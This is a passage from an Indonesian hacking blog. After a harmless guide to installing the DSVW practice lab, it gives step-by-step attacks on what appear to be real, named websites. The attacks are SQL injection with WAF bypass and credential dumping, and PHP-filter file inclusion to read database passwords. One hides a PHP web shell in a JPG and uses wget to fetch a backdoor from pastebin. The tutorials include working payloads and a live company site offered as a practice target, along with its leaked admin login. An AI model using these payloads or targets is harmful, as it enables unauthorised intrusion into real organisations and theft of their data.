HEADLINE NEWS

Cara Install Damn Small Vulnerable Web - DSVW

By On 9:12:00 PM

Halo, Apa kabar?

Melalui artikel kali ini, saya ingin memberikan sebuah tutorial bagaimana cara install damn small vulnerable web (dsvw) di android.

Cara Install Damn Small Vulnerable Web - DSVW

Apa yang dimaksud DSVW?

Damn Small Vulnerable Web (DSVW) adalah aplikasi web yang secara sengaja dibuat memiliki banyak celah keamanan yang ditulis dalam 100 baris kode. Nah dengan adanya DSVW ini, jadi kita bisa belajar web security tanpa harus melanggar hukum, intinya tidak merusak milik orang lain dan tujuannya ini buat pendidikan.

Berikut ini adalah daftar serangan yang tersedia di DSVW.

1. Blind SQL Injection (boolean)
2. Blind SQL Injection (time)
3. UNION SQL Injection
4. Login Bypass
5. HTTP Parameter Pollution
6. Cross Site Scripting (reflected)
7. Cross Site Scripting (stored)
8. Cross Site Scripting (DOM)
9. Cross Site Scripting (JSONP)
10. XML External Entity (local)
11. XML External Entity (remote)
12. Server Side Request Forgery
13. Blind XPath Injection (boolean)
14. Cross Site Request Forgery
15. Frame Injection (phishing)
16. Frame Injection (content spoofing)
17. Clickjacking
18. Unvalidated Redirect
19. Arbitrary Code Execution
20. Full Path Disclosure
21. Source Code Disclosure
22. Path Traversal
23. File Inclusion (remote)
24. HTTP Header Injection (phishing)
25. Component with Known Vulnerability (pickle)
26. Denial of Service (memory)

Banyak sekali tipe serangan di DSVW. Kamu harus mencobanya sendiri nanti.

Oke, daripada kelamaan, sekarang lanjut ke cara install dsvw, simak ya.

Cara Install DSVW

Disini pada contoh installasi, saya menggunakan android yang kentang sekali, sad.

Hal pertama saya asumsikan kamu sudah install aplikasi Termux dan sudah meng-install Python versi 3, karena apa? Karena DSVW ini ditulis dengan bahasa pemrograman python.

Lanjut, kemudian kita download dulu file dsvw, bisa didownload secara manual atau bisa juga dengan melakukan git clone, terserah.

Script DSVW: https://github.com/stamparm/DSVW

Setelah selesai kamu download, sebelum ke tahap running kita install dulu persyaratan apa saja yang harus dibutuhkan di dsvw ini.

Caranya ketikan perintah seperti berikut ini pada terminal termux kamu.

$ pip install -r requirements.txt

Terus tekan enter, jika prosesnya lama itu wajar tunggu aja nanti juga selesai sendiri asalkan sinyal stabil.

Ketika semuanya terpenuhi dalam artian sudah selesai, sekarang ketahap cara menjalankannya.

Simak...

Step Untuk Menjalankan DSVW

Nah, untuk menjalankan aplikasi dsvw tersebut, perintahnya seperti berikut ini.

$ python dsvw.py

Cara Install Damn Small Vulnerable Web - DSVW

Setelah itu kamu salin bagian alamat server tersebut "http://127.0.0.1:65412" kemudian buka aplikasi browser kamu bisa dengan chrome atau firefox terserah, hal ini sesuai kesukaan masing-masing ya :)

Lalu jalankan, apabila berhasil tampilan akan seperti pada gambar berikut ini.

Cara Install Damn Small Vulnerable Web - DSVW
Berhasil Install DSVW - Android

Jika seperti itu artinya kamu sudah berhasil install dsvw di android kamu, congrats!

Maka dari itu sesuai apa yang sudah di jelaskan tadi yaitu tujuan DSVW buat pendidikan jadi ya selebihnya bisa kamu coba untuk belajar mengenai web security tanpa merusak milik orang lain.

Selamat mencoba, Have Fun!.

Demikian tutorial sederhana kali ini, semoga bermanfaat buat kalian semua. Dari saya seperti biasanya kalau ada kesalahan entah itu penulisan/penjelasan mohon di maklumi, karena saya newbie sekedar sharing tidak jelas wkwwkk.

Yowes, Terimakasih.

LFI To RCE Using Malicious Image Upload - POST

By On 12:09:00 AM


Hai, Apa kabar?

Tentunya dengan LFI? Disini kita tidak cuma bisa melakukan file include yang ada pada system target aja. Nah, selain itu kita juga bisa melakukan perintah yakni misal di server linux melalui vulnerability itu sendiri dengan memanfaatkan metode seperti php wrapper dan lain sebagainya. 

Dan yang kita bahas kali ini adalah mengenai LFI To RCE melalui gambar yang mana gambar tersebut sudah di inject atau disisipkan sebuah script php kode.

Tutorial LFI to RCE

Oiya, buat yang belum tau cara inject script php ke gambar, bisa kamu baca pada artikel berikut.


Disitu nanti sudah tertulis dengan jelas kok step by stepnya, oke.

Tutorial LFI To RCE Using Malicious Image Upload - POST

Cerita dikit boleh ya, sebenarnya ini challenge dari grup, dan disitu aturan mainnya disuruh buat pentest website tersebut lalu upload file berbentuk txt pada directory home website tersebut, kurang lebih seperti itu deskripsinya.

Lanjut...

Nah, sekarang hal pertama yang saya lakukan adalah Recon, kira-kira website tersebut mempunyai celah apa sih? Setelah cari-mencari akhirnya saya menemukan url yang kelihatan unik dan berbeda dari yang umumnya.

Contoh URL:
http://domain/index.php?file=about_us.php&&page=Contact Us

Jadi sudah ketemu, tanpa berpikir terlalu lama saya langsung mencoba dengan Local File Inclusion. Kemudian tambahkan /etc/passwd dibelakang file= ,setelah itu baru saya jalankan dan hasilnya malah kena WAF FORBIDDEN.

It's oke tidak apa-apa, sekarang lakukan bypass dengan menambahkan double slash // jadinya seperti ini //etc//passwd ,lalu jalankan.

Tutorial LFI To RCE

Waf pun berhasil di bypass, sip!

Tapi ya, singkat cerita disini saya tidak bisa membaca /proc/self/environ entah bagaimana saya tidak mengerti juga tiba-tiba web tersebut terjadi kesalahan semacam server error gitu. Untuk hal ini pun saya SKIP aja.

Setelah dengan LFI tadi gagal, disini saya berpikir apakah bisa di SQL Injection? Lalu saya pun mencobanya, dan hasilnya...

Tutorial LFI To RCE

Yoloo, benar saja web tersebut mempunyai celah SQL Injection, oke menarik.

Tidak ingin menjelaskan terlalu panjang karena untuk mempersingkat waktu, dan singkat cerita disini dengan teknik sql injection yang terdapat pada web tersebut, saya berhasil mendapatkan username dan password untuk login, tentunya setelah melalui beberapa proses umumnya sqli.

Tutorial LFI To RCE


Oke-oke, sekarang tinggal bagaimana cara mencari admin login pada website tersebut, tapi sebelumnya saya sudah tahu tempat admin login website tersebut berada. Dikarenakan sudah saya scan pake tool Admin Finder.

Kemudian saya login...

LFI To RCE

Dan boom saya berhasil masuk pada dashboard admin panel website tersebut dengan menggunakan username dan password tadi yang saya dapatkan dari celah sql injection.

Selanjutnya, apa yang harus saya lakukan?
Oiii,,, upload shell backdoor lah bro, oh iya ya.
Ingat? Kan di challenge tersebut tantanggannya adalah untuk bisa upload file txt pada home directory nya, oke shap.

Sekarang cari tempat from upload...

Setelah menemukan from upload gambar, barulah saya mencoba untuk upload file shell backdoor dengan ektensi .php, tapi sayang website tersebut memberikan sebuah pesan error "Unknown extension. Only JPG/JPEG/ files are allowed" berarti selain JPG/JPEG file lain tidak diperbolehkan.

Tutorial LFI To RCE

Sudah di bypass shell backdoornya? Sudah, tapi hasilnya ya tetap sama aja unknown extension. Kalau tamper data? Gak tahu! Lha wong saya make Hp Android wkwk.

Sebentar ngopi-ngopi dulu dan mencari ide.

Nah oke lanjut, untuk cara mengatasi tidak bisa upload shell tadi adalah kita akali dengan meng-upload shell.jpg yang sebelumnya shell.jpg tersebut sudah saya sisipkan script php code.

Cara inject script php di gambar gimana? Kan tadi saya sudah sertakan bacaan pada bagian awal, kalau lupa coba scroll ke atas lagi.


Eksekusi LFI To RCE Melalui Malicious Image

Sesudah berhasil upload shell.jpg sekarang tinggal mencari dimana letak shell.jpg tadi terupload.

Setelah mencari, disini saya mendapatkan path letak dimana file shell.jpg tersebut disimpan, kurang lebih seperti ini jelasnya.

Tutorial LFI To RCE

Lalu bagaimana cara mengeksekusi shell tersebut?

Perhatikan baik-baik, cara mengeksekusi shell.jpg tersebut dengan cara seperti ini, kita hanya tinggal include file tersebut melalui celah tadi yaitu Local File Inclusion, kira-kira seperti berikut ini contoh biar tidak bingung.

http://domain/index.php?file=adhoc_staffs/5_umaru.jpg

Kira-kira kalau di jalankan tampilan website tersebut akan seperti berikut ini.

Tutorial LFI To RCE

Lalu bagaimana cara menggunakan shell umaru.jpg tersebut?

Jadi sebelumnya, pada saat saya melakukan inject script php pada gambar umaru.jpg tersebut, saya sudah menyisipkan script php seperti berikut ini.

Script PHP:
<style>body{font-size: 0;}h1{font-size: 12px}</style><h1> <?php if(isset($_REQUEST['umaru'])){system($_REQUEST['umaru']);}else{echo '<img src="LINK GAMBAR" border=0> ';}__halt_compiler();?></h1>

Jadi kalau kita pahami, cara mengeksekusi command payload shell tersebut dengan menambahkan &umaru=  dibelakang .jpg

Kalau digabukan menjadi seperti ini,

http://domain/index.php?file=adhoc_staffs/5_umaru.jpg&umaru=(command)

Paham kan? Yasudah.

Oke sebagai contoh, saya ingin menjalankan command id, jadi kurang lebih seperti ini perintahnya.

http://domain/index.php?file=adhoc_staffs/5_umaru.jpg&umaru=id

Tutorial LFI To RCE

Bisa lihat pada gambar tersebut, command id tersebut berhasil dieksekusi. Selebihnya tinggal kalian exploitasi sendiri dengan command-command yang lain seperti whoami, ls -la, dan lain sebagainya.


Balik lagi ke tujuan awal tadi, berhubung challenge nya disuruh untuk upload file text di home directory website tersebut, saya akan menyelesaikan tantangan tersebut.

Berikut caranya, yang saya lakukan pertama upload shell backdoor dulu baru lagi upload file txt.

Command Untuk Upload Shell Backdoor

http://domain/index.php?file=adhoc_staffs/5_umaru.jpg&umaru=wget https://pastebin.com/raw/qp6SzDT0 -O kalioujny.php

Tutorial LFI To RCE

Setelah saya jalankan malah forbidden. Oke sekarang kita coba ulangi lagi tapi kali ini dengan menggunakan metode POST DATA.

Disini saya menggunakan Anon Hackbar untuk melakukan post data.
Kira-kira seperti ini caranya melakukan POST DATA pada Anon Hackbar.

URL
http://www.ascollegebikramganj.org/index.php?file=adhoc_staffs/5_umaru.jpg

POST DATA
umaru=wget  https://pastebin.com/raw/qp6SzDT0 -O kalioujny.php

Tutorial LFI To RCE - POST DATA

Setelah itu klik EXECUTE pada tombol tersebut.

Nah, untuk mengetahui shell backdoor tersebut sudah ter upload atau belum, mari kita cek. Terus cara akses shellnya gimana? Caranaya seperti ini http://namaweb/namashellkalian.php

Berikut ini ketika saya berhasil upload shell pada website tersebut,

Tutorial LFI To RCE

Jadi ya tinggal upload file txt sesuai permainan...

Tutorial LFI To RCE

Baiklah oke, berarti saya sudah berhasil melakukan challenge tersebut, kurang lebih prosesnya seperti apa yang saya tulis tersebut.

Challenge selesai...

Disini saya bukan sok pro, tapi lebih ke berbagi pengalaman aja. Suka ya makasih tidak suka ya tidak apa-apa, tanggapan orang kan berbeda-beda.

Akhirnya selesai, ya semoga bermanfaat buat teman-teman semua dan mohon maaf apabila ada yang kurang jelas entah itu penyampain atau bahkan kesalahan dalam penulisan, mohon dimaklumi ya.

Selamat berpuasa bagi yang menjalankan puasa #Ramadhan2020 dan yang tidak puasa ya tidak apa-apa, eh mending kita ngopi yuk wkwk.

Sekian dan terimakasih. Matursuwun!.

Tutorial Local File Inclusion php://filter Base64

By On 12:01:00 AM


Hallo, apa kabar?

Melalui artikel kali ini, saya ingin sharing mengenai cara melihat isi source file code  website target yang mempunyai rentan terhadap LFI dengan menggunkan payload atau metode php://filter.

lfi php filter base64

INFO: Sebenarnya ini challenge dari sebuah grup, yaudah saya penasaran lalu saya coba. Oke skip,  mari kita lanjut aja.

Buat yang sudah mengerti tentang LFI, monggo kalian lewati aja. Nah buat yang belum tahu, LFI adalah singkatan dari Local File Inclusion Lalu maksudnya apa? Yakni akses yang tidak sah ke file yang ada di sistem. Celah ini memungkinkan seorang penyerang bisa mendapatkan akses ke file sensitif di server.

Jika masih belum paham, coba googling dulu hehe.

Tutorial Local File Inclusion php://filter

Contoh target challenge: http://url.com

Kira-kira website target tersebut ada celah apa? Untuk menjawab rasa penasaran saya, kemudian saya view-source pada website tersebut. Setelah cari-cari, disini saya menemukan sebuah paramater menarik seperti pada gambar bawah ini,

lfi php filter base64

Jika saya klik url tersebut akan seperti ini,

http://url.com/news/index.php?page=news.php&id=535&n_t=1

Hmm, apakah website tersebut mempunyai rentan LFI di parameter page=news.php oh atau mungkin ada celah sqli id=353 ?? Kita coba aja.

Ekploitasi Kerentanan

Sebelumnya pada challenge tersebut, saya disuruh untuk menemukan MySQL host, user, dan password.

lfi php filter base64

Nah, pertanyaan yang muncul selanjutnya adalah "apa yang harus saya lakukan dan bagaimana caranya?" Jawaban sederhananya yaitu tanpa berpikir terlalu pusing kita bisa menggunakan metode php://filter kan disitu challenge-nya LFI, sudah dipastikan ini vuln lfi, ya kan? Hahaha.

[Payload] php://filter
php://filter/convert.base64-encode/resource=

Yap benar, untuk menemukan data MySQL seperti host dll saya menggunakan teknik php://filter, jadi kira-kira seperti ini payload yang saya gunakan.

http://url.com/news/index.php?page=php://filter/convert.base64-encode/resource=index.php&id=535&n_t=1

Setelah itu saya tekan enter akan muncul enkripsi berupa base64 encode, kira-kira seperti pada gambar berikut ini.

lfi php filter base64

Selanjutnya untuk melihat hasil tersebut, saya decode code tersebut dan hasilnya seperti ini.

lfi php filter base64

CATATAN: Untuk melakukan encode/decode saya menggunakan tools ini > Website Base64 Encode/Decode Online.

Nah, sampai sini saya sudah mendapatkan source code dari include filenya, selanjutnya tinggal mencari atau explore aja.

Langkah selanjutnya mengganti file index.php dengan ../template/head.php

http://url.com/news/index.php?page=php://filter/convert.base64-encode/resource=../template/head.php&id=535&n_t=1

Kemudian jalankan, dari hasil output tersebut yang sudah saya decode seperti ini.

lfi php filter base64

Terlihat jelas disitu, file ../include/connect_inc.php artinya kita bisa melihat isi dari file database tersebut, seperti host, user, password.

Jadi sekarang kita ganti directory ../template/head.php dengan ../include/connect_inc.php kira-kira seperti ini lengkapnya.

http://url.com/news/index.php?page=php://filter/convert.base64-encode/resource=../include/connect_inc.php&id=535&n_t=1

Setelah itu saya enter, kemudian seperti biasa untuk melihat isi dari include file tersebut ke yang aslinya lakukan decode terlebih dahulu.

Dan boom, berhasil.

lfi php filter base64

Dari gambar tersebut saya berhasil menemukan MySQL host, user, dan password. Artinya saya sudah berhasil melakukan challenge tersebut.

Selesai...

Demikian artikel kali ini tentang LFI php://fillter, semoga apa yang saya tulis ini dapat bermanfaat buat semua orang. Apabila ada kesalahan kata/penjelasan saya mohon maaf.

Yasudah terimakasih, untuk semuanya.

Tutorial XSS In SQL Injection

By On 10:40:00 PM

Hallo, Apakabar?

Melalui artikel kali ini, saya ingin sharing sedikit tutorial tentang xss di sql injection, penasaran? Oke, simak aja ya hehe.

Apa itu XSS In SQL Injection?

Nah jadi, teknik ini sebenarnya tidak jauh berbeda dengan SQL Injection manual seperti biasa. Akan tetapi didalam query sql injection nanti kita masukan sebuah script xss.

Tutorial XSS in SQL Inkection

Untuk melakukan teknik seperti ini setidaknya punya basic pengetahuan tentang xss, saya rasa mungkin teman-teman semua banyak yang sudah tahu apa itu xss, jadi saya tidak perlu menulis lagi soal xss. Kalau ada yang belum tahu saran dari saya, silahkan kamu bisa googling terlebih dahulu, oke.

Baiklah, tanpa berlama-lama kita langsung ke tutorialnya saja ya, letsgoo.

Tutorial XSS In SQL Injection


INFO: Untuk bagian mengecek web tersebut vulnerable atau tidak saya skip dan untuk cara menentukan balancing atau comment saya skip juga, karena apa? Karena kamu pasti sudah mengerti. Jadi saya langsung lompat saja ke step menentukan jumlah columns.

Step 1: Menentukan Jumlah Columns


Nah, langkah selanjutnya adalah menentukan berapa jumlah kolom dari table di database yang digunakan pada website tersebut. Untuk caranya kita seperti biasa menggunakan order by dan sampai menemukan diangka berapa terdapat error.

url/rooms.php?id=1' order by 1--+ Normal
url/rooms.php?id=1' order by 5--+ Normal
url/rooms.php?id=1' order by 7--+ Normal
url/rooms.php?id=1' order by 8--+ Normal
url/rooms.php?id=1' order by 9--+ Error

Oke sip, pada target disini error muncul diangka ke 9, itu artinya kalau jumlah kolom hanya ada 8.

Step 2: Mencari Angka Ajaib


Seperti biasanya, angka ajaib atau bisa disebut juga dengan nama magic number ini bisa kita dapatkan dengan menjalankan payload union select.

Oiya, dalam hal ini kamu sesuaikan sendiri dengan jumlah table yang kamu temukan pada website target, jangan samakan dengan tulisan ini karena akan berbeda, dan ingat tambahkan tanda - dibelakang = ya.

url/rooms.php?id=-1' union select 1,2,3,4,5,6,7,8--+

Setelah saya menjalankan payload tersebut, disini output angka ajaibnya adalah 2, 3, 4.

Menentukan Angka Ajaib - SQLI

Dari angka yang kita peroleh tersebut bisa kita gunakan untuk melangkah ke tutorial berikutnya, yaitu memasukan script xss dibagian angka ajaib tadi.

Step 3: Memasukan Script XSS


Script XSS:
<script>alert("XSS")</script>

Script XSS Encode Hex:
0x3c7363726970743e616c657274282258535322293c2f7363726970743e

Nah tadi dibagian angka ajaibnya kita coba masukan script xss tersebut, seperti ini caranya.

url/rooms.php?id=-1' union select 1,2,<script>alert("XSS")</script>,4,5,6,7,8--+

Query encode,

url/rooms.php?id=-1' union select 1,2,0x3c7363726970743e616c657274282258535322293c2f7363726970743e,4,5,6,7,8--+

Setelah itu jalankan, jika muncul pop up seperti pada gambar (lihat gambar) berarti bisa dibilang kode berhasil dieksekusi.

Sqli with script xss

CATATAN: Terkadang kalau kita memasukan script kode tersebut, beberapa website tidak bisa menerima kode secara langsung, nah untuk mengakalinya kita bisa encode ke HEX terlebih dahulu.

Step 4: Menggabungkan Query SQL Injection Dengan Script XSS


Nah sekarang, tinggal bagaimana cara buat menggabungkan query sql injection dengan script xss? Jadi caranya seperti berikut ini, tinggal masukan querynya didalam kode script xss tersebut.

Query/Dios: (select(group_concat(table_name,0x3a3a,column_name)) from information_schema.columns where table_schema=database())

Sekarang kita bisa coba masukan ke dalam kode xss, jadi kurang lebih querynya akan seperti ini,

url/rooms.php?id=-1' union select 1,2,concat(<script>alert(",(select(group_concat(table_name,0x3a3a,column_name)) from information_schema.columns where table_schema=database()),")</script>),4,5,6,7,8--+

Perhatikan baik-baik ya, sebelum menjalankan kode tersebut, sekarang kita lakukan encode dibagian kode script xxs ke value hex.

<script>alert(" = 0x3c7363726970743e616c6572742822

")</script> = 0x22293c2f7363726970743e

Maka jika digabungkan jadi seperti ini,

url/rooms.php?id=-1' union select 1,2,concat(0x3c7363726970743e616c6572742822,(select(group_concat(table_name,0x3a3a,column_name)) from information_schema.columns where table_schema=database()),0x22293c2f7363726970743e),4,5,6,7,8--+

Kemudian tinggal jalankan, apabila sukses website tersebut akan menampilkan popup.

Sqli with dios di script xss popup

Yah, tampilanya kok berantakan?

Sekarang mari kita coba percantik dengan menambahkan breakrow agar supaya kelihatan lebih rapi dan tersusun.

CATATAN: Di XSS tanda breakrow seperti <br> tidak bisa digunakan, jadi alternatif lain kita bisa memakai seperti ini \n

Jadi cara menambahkan \n seperti ini ya, simak baik-baik.

url/rooms.php?id=-1' union select 1,2,concat(0x3c7363726970743e616c6572742822,(select(group_concat(\n,table_name,0x3a3a,column_name)) from information_schema.columns where table_schema=database()),0x22293c2f7363726970743e),4,5,6,7,8--+

Disitu saya menambahkan \n sebelum table_name, sekarang kita encode \n terlebih dahulu ke hex value.

\n = 0x5c6e

Jadi kalau kita gabungkan maka kurang lebih querynya akan seperti ini,

url/rooms.php?id=-1' union select 1,2,concat(0x3c7363726970743e616c6572742822,(select(group_concat(0x5c6e,table_name,0x3a3a,column_name)) from information_schema.columns where table_schema=database()),0x22293c2f7363726970743e),4,5,6,7,8--+

Kemudian jalankan, maka jika berhasil akan seperti pada tampilan berikut ini.

Sqli with popup xss

Sekarang tampilanya sudah tersusun rapi bukan?
Oke selanjutnya, kita coba print nama kita, version, database dan lain sebagainya.

Berikut ini caranya, cukup masukan kedalam querynya saja.

url/rooms.php?id=-1' union select 1,2,concat(0x3c7363726970743e616c6572742822,(select(concat(Injected By Kalioujny\n,version(),\n,user(),\n,database(),\n,(group_concat(0x5c6e,table_name,0x3a3a,column_name)))) from information_schema.columns where table_schema=database()),0x22293c2f7363726970743e),4,5,6,7,8--+

Bingung tidak? Saya akan jelaskan dibawah berikut ini jika masih binggung.

teks warna blue: query xss.
teks warna red: query tambahan contoh misalnya, version(), user(), database() dan lain sebagainya.
teks warna green: query dios.

Seperti biasa, sebelum menjalankan kita encode querynya terlebih dahulu bagian seperti nama kita, \n, tapi bagian version(), user(), database() tetap biarkan saja seperti aslinya jangan di encode.

url/rooms.php?id=-1' union select 1,2,concat(0x3c7363726970743e616c6572742822,(select(concat(0x496e6a6563746564204279204b616c696f756a6e795c6e,version(),0x5c6e,user(),0x5c6e,database(),0x5c6e,(group_concat(0x5c6e,table_name,0x3a3a,column_name)))) from information_schema.columns where table_schema=database()),0x22293c2f7363726970743e),4,5,6,7,8--+

Setelah itu tinggal kamu jalankan, jika berhasil maka tampilanya akan seperti ini,

Payload XSS SQL Injection

Kalau tidak muncul gimana? Mungkin ada kesalahan kali itu, coba teliti kembali ya.

Kebanyakan kalau gagal dalam mengeksekusi query xss ke dalam sql injection itu biasanya penyebabnya adalah penempatan koma, jadi hal ini harus benar-benar diteliti kembali ya.

Selesai...

Demikian artikel sederhana yang saya tulis ini tentang Tutorial XSS In SQL Injection, semoga dapat bermanfaat buat semua orang. Apabila ada kesalahan dalam penulisan atau penjelasan mohon dimaklumi ya hehe.

Oiya, jika ada sesuatu yang ingin ditanyakan monggo silahkan tulis dikolom komentar yang sudah disediakan ya, sebisa mungkin nanti saya akan bantu jawab, oke.

Berhubung dunia saat ini sedang ada Pandemi Virus Corona Covid-19, maka tetap #DiRumahAja jangan lupa jaga diri kalian, jaga kesehatan juga ya. Semoga dunia ini lekas membaik ❤️ amin.

Akhir kata, Maturnuwun, Terimakasih.

Tutorial SQL Injection Base64 Encode Dan Decode - Android

By On 9:35:00 PM


Halo, Apakabar?

Melalui artikel kali ini, saya akan share mengenai tutorial base64 SQL Injection. Jika kita ketahui teknik ini sebenarnya mudah, seperti SQL Injection manual biasa dan dari kita hanya butuh kesabaran dalam eksekusi target.

Tutorial SQL Injection Base64

Dalam kasus ini, saya menggunakan Hp Android. Lalu apa aja bahan yang harus diperlukan? Simak penjelasan berikut ini.

1. Target
2. Tools Base64 Encode dan Decode

-Target

DISCLAIMER: Untuk live target yang saya berikan, mohon untuk jangan dirusak cukup jadikan sebagi bahan pembelajaran.

Nah, untuk target sebagai bahan pembelajaran, saya sudah menyiapkan untuk kamu coba test sendiri, berikut targetnya.

http://www.hindustanforge.co.in/sub_product.php?id=MTM=

-Tools Base64 Encode/Decode

Jadi untuk type SQL Injection ini kita harus membutuhkan tools untuk encode/decode dan saya sudah menyiapkan semuanya.

https://www.base64decode.org/

Yasudah daripada kamu sudah penasaran, tanpa berlama-lama langsung saja kita ke point pembahasanya saja, yuk lestgoo.

Tutorial SQL Injection Base64


Untuk yang pertama, tadi target saya seperti ini.

http://www.hindustanforge.co.in/sub_product.php?id=MTM=

Kemudian kita Decode terlebih dahulu dan menjadi seperti ini,

http://www.hindustanforge.co.in/sub_product.php?id=13

Buat yang belum mengerti cara decodenya gimana? Berikut caranya.

1. Buka Website Base64 Decode and Decode
2. Kemudian salin berikut ini MTM=
3. Lalu pastekan kode MTM= ke kolom tersebut
4. Selanjutnya tekan tombol <DECODE>

Paham kan? Jika belum coba lihat gambar berikut ini,

Base64 Website Sqli

Step 1: Cek Vuln Pada Target

Sekarang mari kita cek terlebih dahulu apakah website tersebut vuln sql injection atau tidak dengan menggunakan perintah tanda petik satu '

http://www.hindustanforge.co.in/sub_product.php?id=13'

Kita Encode dulu, maka jadinya.

http://www.hindustanforge.co.in/sub_product.php?id=MTMn

Setelah itu jalankan, dan teryata benar bahwa website tersebut vuln sqli karena setelah saya menambahkan tanda petik ' lalu diencode content pada website tersebut hilang.

Error Sql Injection Base64

Apakah ini benar-benar vuln? Sekarang untuk memastikannya bisa di injeksi atau tidak, kita lakukan comment atau balancing dibelakang tanda ' (istilahnya menggembalikan website ke tampilan semula) dengan menggunakan tanda -- -

http://www.hindustanforge.co.in/sub_product.php?id=13'-- -

Dan jangan lupa kita Encode terlebih dahulu, maka akan seperti ini,

http://www.hindustanforge.co.in/sub_product.php?id=MTMnLS0gLQ==

Fixed Error Sql Injection Base64

Website pun kembali ke tampilan semula atau normal, oke fix!

Step 2: Mencari Jumlah Table

Seperti biasanya, untuk mencari atau menghitung jumlah table yang ada didalam website tersebut, kamu bisa menggunakan perintah order by dan sampai muncul diangka berapa terdapat error tersebut.

Kita coba 1, tetapi masih normal
http://www.hindustanforge.co.in/sub_product.php?id=13' order by 1-- -

Kita Encode pake tools base64 online tadi, maka jadinya,
http://www.hindustanforge.co.in/sub_product.php?id=MTMnIG9yZGVyIGJ5IDEtLSAt

Kita coba 5, dan masih normal
http://www.hindustanforge.co.in/sub_product.php?id=13' order by 5-- -

Jangan lupa di Encode,
http://www.hindustanforge.co.in/sub_product.php?id=MTMnIG9yZGVyIGJ5IDUtLSAt

Kita coba 10, oh ternyata error
http://www.hindustanforge.co.in/sub_product.php?id=13' order by 10-- -

Encode,
http://www.hindustanforge.co.in/sub_product.php?id=MTMnIG9yZGVyIGJ5IDEwLS0gLQ==

Kita coba angka 9
http://www.hindustanforge.co.in/sub_product.php?id=13' order by 9-- -

Lalu kita Encode,
http://www.hindustanforge.co.in/sub_product.php?id=MTMnIG9yZGVyIGJ5IDktLSAt

Setelah saya jalankan, hasilnya website tersebut normal kembali. Berarti bisa kita pahami kalau jumlah table atau kolom hanya ada sampai 9 saja.

Step 3: Mencari Angka Ajaib

Langkah selanjutnya adalah mencari angka ajaib atau magic number dengan menggunakan union select. Ingat ya, tambahkan tanda - dibelakang = supaya angka ajaibnya muncul.

http://www.hindustanforge.co.in/sub_product.php?id=-13' union select 1,2,3,4,5,6,7,8,9-- -
Jangan lupa di Encode, maka hasilnya

http://www.hindustanforge.co.in/sub_product.php?id=LTEzJyB1bmlvbiBzZWxlY3QgMSwyLDMsNCw1LDYsNyw4LDktLSAt

Waf Forbidden SQL Injection Base64

Setelah saya jalankan, disini ternyata union atau selectnya terkena WAF 403 Forbidden ah sialan, semoga waf ini bypassnya tidak rumit karena hanya akan bikin pusing.

Kita coba bypass waf tersebut seperti ini,
http://www.hindustanforge.co.in/sub_product.php?id=-13' /*!50000union*/ select 1,2,3,4,5,6,7,8,9-- -

Kita Encode,
http://www.hindustanforge.co.in/sub_product.php?id=LTEzJyAvKiE1MDAwMHVuaW9uKi8gc2VsZWN0IDEsMiwzLDQsNSw2LDcsOCw5LS0gLQ==

Apakah WAF 403 Forbidden tersebut berhasil kita bypass? Setelah itu jalankan untuk melihat hasil output tersebut.

Waf Forbidden Bypassed

Oke mantap, waf sudah berhasil kita bypass artinya permasalahannya selesai. Disini angka ajaib website tersebut muncul angka 2.

Selanjutnya adalah kita akan dump username dan password website tersebut dengan menggunakan DIOS (Dump In One Shoot) simak caranya dibawah ini.


Step 4: Mencari Username dan Password

Untuk proses dump username dan password, disini saya menggunakan DIOS By Zen.

make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@)

Kira-kira seperti berikut ini caranya dump dengan menggunakan dios,

http://www.hindustanforge.co.in/sub_product.php?id=-13' /*!50000union*/ select 1,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),3,4,5,6,7,8,9-- -

Jangan lupa di Encode dulu ya gaes,

http://www.hindustanforge.co.in/sub_product.php?id=LTEzJyAvKiE1MDAwMHVuaW9uKi8gc2VsZWN0IDEsbWFrZV9zZXQoNixAOj0weDBhLChzZWxlY3QoMSlmcm9tKGluZm9ybWF0aW9uX3NjaGVtYS5jb2x1bW5zKXdoZXJlQDo9bWFrZV9zZXQoNTExLEAsMHgzYzZjNjkzZSx0YWJsZV9uYW1lLGNvbHVtbl9uYW1lKSksQCksMyw0LDUsNiw3LDgsOS0tIC0=

Setelah saya jalankan tampilan website tersebut seperti berikut ini,

Dump Database Sql Injection Base64

Apa yang kamu lihat? Setelah kita masukan dios malah berantakan tablennya, tentunya ini akan sedikit menggangu proses mencari column admin, nah untuk mengakalinya tambahkan view-source diawal url seperti berikut ini,

view-source:http://www.hindustanforge.co.in/sub_product.php?id=LTEzJyAvKiE1MDAwMHVuaW9uKi8gc2VsZWN0IDEsbWFrZV9zZXQoNixAOj0weDBhLChzZWxlY3QoMSlmcm9tKGluZm9ybWF0aW9uX3NjaGVtYS5jb2x1bW5zKXdoZXJlQDo9bWFrZV9zZXQoNTExLEAsMHgzYzZjNjkzZSx0YWJsZV9uYW1lLGNvbHVtbl9uYW1lKSksQCksMyw0LDUsNiw3LDgsOS0tIC0=

Dump Database Sql Injection Base64

Nah kalau seperti kan lebih enak yakan? Hehe.

Baiklah, selanjutnya sekarang mencari username dan password website tersebut. Pada target disini nama columnnya adalah login dan didalam table login terdapat nama seperti id, username, dan password.

Dump Username dan Password with Dios

Disini saya ambil username dan passwordnya saja, nah jika kita masukan pada dios tersebut kurang lebih akan seperti ini caranya.

http://www.hindustanforge.co.in/sub_product.php?id=-13' /*!50000union*/ select 1,make_set(6,@:=0x0a,(select(1)from(login)where@:=make_set(511,@,0x3c6c693e,username,password)),@),3,4,5,6,7,8,9-- -

Oiya seperti biasanya kita Encode dulu, maka jadinya seperti ini,

http://www.hindustanforge.co.in/sub_product.php?id=LTEzJyAvKiE1MDAwMHVuaW9uKi8gc2VsZWN0IDEsbWFrZV9zZXQoNixAOj0weDBhLChzZWxlY3QoMSlmcm9tKGxvZ2luKXdoZXJlQDo9bWFrZV9zZXQoNTExLEAsMHgzYzZjNjkzZSx1c2VybmFtZSxwYXNzd29yZCkpLEApLDMsNCw1LDYsNyw4LDktLSAt

Setelah itu jalankan, maka hasilnya akan seperti berikut ini,

Berhasil Dump Username dan Password dengan Dios by Zen

Hasil output tersebut adalah,
Username: HIN@2017
Password: HIN@2017

Dump username dan password berhasil. Ya kalau sudah begini, tinggal cari admin loginnya saja wkwkwk.

Selesai juga akhirnya...

Nah oke, mudah bukan tutorialnya?
Ya emang seperti inilah SQL Injection base64, sama seperti tutorial sql injection manual biasa tapi yang membedakannya disini adalah querynya terlebih dahulu harus kita convert ke base64.

